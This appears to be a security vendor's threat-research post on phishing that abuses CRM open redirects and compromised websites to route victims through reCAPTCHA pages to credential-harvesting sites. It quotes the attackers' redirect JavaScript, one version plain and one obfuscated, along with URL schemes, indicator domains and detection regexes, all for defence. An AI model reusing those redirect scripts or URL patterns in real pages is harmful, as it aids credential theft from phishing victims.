A deeper dive of the nefarious use of open redirects in conjunction with reCAPTCHA

Gone phishing? Beware of what you (re)CAPTCHA

A deeper dive of the nefarious use of open redirects in conjunction with reCAPTCHA

It’s no surprise that phishing continues to be the main access vector when targeting everything from small to large businesses. Our team has continued the research that Microsoft has published in order to further highlight some of the behavior we’ve been observing in our customer environments. The purpose of this work is to share the results of what IronNet has seen, and to allow others to build off this research. We’ve divided our research into three groups:

Table of Contents

1. Customer Relationship Management (CRM) platforms allowing open redirects

2. Compromised websites redirecting to reCAPTCHA

3. Random reCAPTCHAs

IronNet research

1. CRMs allow open redirects

We began our research by using the regex provided within the Microsoft blog post for hunting retroactively for the DGA-like domains. What we confirmed was that there were some CRMs from household name companies that were allowing open redirections to the malicious phishing pages. Based on our retroactive hunts, the actors seemed to be targeting a specific CRM platform based off the URL structure for these requests.

https://t.msg.<domain>/r/id=<messageid>,<deliveryID>,<trackingURL>&p1=<malicious url>

The use of these CRMs seems to have started within the first quarter of 2021, and some are no longer active. Although we did find a handful of examples that led into the second quarter of 2021, we believe the discrepancy is based upon when the customer discovered this abuse and fixed their settings. When searching for any examples of current abuse (past two months), we did discover the use of other CRMs allowing open redirection. For the companies where we observed this behavior and it was still ongoing, we reached out to them to ask them to stop allowing this.

2. Websites redirecting to phishing reCAPTCHA

Compromised websites

While confirming the abuse of CRMs, we also discovered the use of compromised websites being used to redirect users to phishing reCAPTCHA landing pages as well. With the compromised websites, we noticed two main patterns in the URL schema, as well as, the javascript on the compromised websites.

1st pattern:

<random subdomain>.<compromised domain>/<base64 of user being phished>

The Javascript code bellow typically accompanies compromised websites that are using the first pattern.

<script type="text/javascript">
let url = window.location.hash;
let url1 = window.location.hash.substring(1);
console.log();
window.location=window.atob(url1)
</script>

2nd pattern: 

<name>.<compromised domain>/?#<base64 encoded domain + user email>
The decoded portion of the path will decode to:
 
https://example.co.ug?e=username@example.com
 

Compromised websites with the second pattern typically are hosting the following Javascript and will take in any subdomain and parse the URL parameter, decode it, and then redirect the user to the phishing page and pass along their email.

 
<script type="text/javascript">
var _0xdad1=['_self','location','hash'];(function(_0x9989e4,_0xdad1ad){var _0x21d0aa=function(_0x1664ef){while(--_0x1664ef){_0x9989e4['push'](_0x9989e4['shift']());}};_0x21d0aa(++_0xdad1ad);}(_0xdad1,0x19c));
var _0x21d0=function(_0x9989e4,_0xdad1ad){_0x9989e4=_0x9989e4-0x0;var _0x21d0aa=_0xdad1[_0x9989e4];
return _0x21d0aa;};
var _0x5c3ff0=_0x21d0,hash=window[_0x5c3ff0('0x0')][_0x5c3ff0('0x1')],gethash=hash['split']('#')[0x1],decodedhash=atob(gethash),URL=decodedhash;
window['open'](URL,_0x5c3ff0('0x2'));
</script>

Examples of the landing pages:

As you can see, the pattern from the original Microsoft article has evolved and is now including new patterns. We believe this to be the result of multiple threat actors changing up their pattern in order to avoid simple detections looking for the original pattern, just like we did.

microsoft.iaronlnie.com
microsoft.tarrnac.com
royalhomesvictoria.com
habeeb.co.ug/main/
ivrisi.org.ge/main/
cbtb7-bkbd6.xyz/main/
9sd-hh.xyz/main/

 

3. Other reCAPTCHAs

Finally, there are pages that we discovered that didn’t match any known pattern but are hosting the same phishing kit. Users are met at the reCAPTCHA page and then forwarded on to the corresponding phishing site to enter their credentials. Using http://urlscan.io, we were not able to determine how a user might have gotten to these pages.

What’s new about this research and why should we care?

As the Microsoft blog post pointed out, what’s new about this campaign is the use of open redirects in conjunction with reCAPTCHA. Not only are threat actors abusing domains with good reputation, they are actively attempting to thwart analysis of the redirect chain.

This type of campaign can be alarming for companies who invest in cyber training, especially in cases that recommend employees hover over the link to see where it is going before they click. In this instance, employees are likely to trust these domains because they are owned by legitimate companies. It has also been widely discussed how most users, when presented with a reCAPTCHA, believe a website to be more legitimate. This is not the first time this technique has been employed by phishing actors and it is not the first time it has been effective.

We know adversaries, especially ransomware gangs, use phishing and credential harvesting as initial attack vectors for compromising businesses. Through this research, we discovered the targeting of very large companies that if successfully phished, would absolutely make for great targets of a ransomware campaign. We provided some detection methods below for two reasons:

1. We want to give companies the ability to detect if any of their users were phished by doing retroactive hunts over the CRMs that were allowing redirection and the domains of the landing pages.

2. We want companies to know if their CRM or website is being abused to allow redirection which it should not be.

Detection

We’ve built out some https://urlscan.io queries, as well as regex for others to see the results that we’ve found. In order to pull more than 100 results, you will need a https://urlscan.io pro account.

REGEXs

We have produced the following REGEX query that will find all the relevant final destination (FD) phishing domains with high accuracy. We have also included the URLScan query syntax.

REGEX:

All phishing URLs abusing reCAPTCHA

^(http)(s)?:\/\/([a-z0-9]+\.)?([a-z0-9\-])+\.[a-z]+\/(main|jump)\/$

urlscan.io Query

filename:"/recaptcha/api.js" AND page.url.keyword:/(http)(s)?:\/\/([a-z0-9]+\.)?([a-z0-9\-])+\.[a-z]+\/(main|jump)\//
 

Jupyter Notebook:

New domains continue to pop up daily, so we have provided a Jupyter Notebook for researchers to pull down and extract results from urlscan using our methodology.

Link: urlscan notebook

Call to action

When registering a reCAPTCHA for a website, the administrator must tie the website or websites they wish to secure to a Google account. This is good news for defenders because this means that once a malicious phishing domain that uses reCAPTCHA has been discovered, Google should be able to identify the Google account that is tied to that website and deactivate the account, effectively shutting down all other phishing domains that leverage this service. To be clear, the phishing domains and servers will still technically be operational, but once Google deactivates the associated account and until the malicious actor removes the reCAPTCHA integration, the site will be unreachable. With the already detected domains and reCAPTCHA site keys we have provided at the below GitHub link and the detection techniques we have outlined above, Google could potentially put an end to this campaign entirely.

Indicators of Compromise:

Link: GitHub

 

About Ironnet
IronNet is dedicated to delivering the power of collective cybersecurity to defend companies, sectors, and nations. By uniting advanced technology with a team of experienced professionals, IronNet is committed to providing peace of mind in the digital world.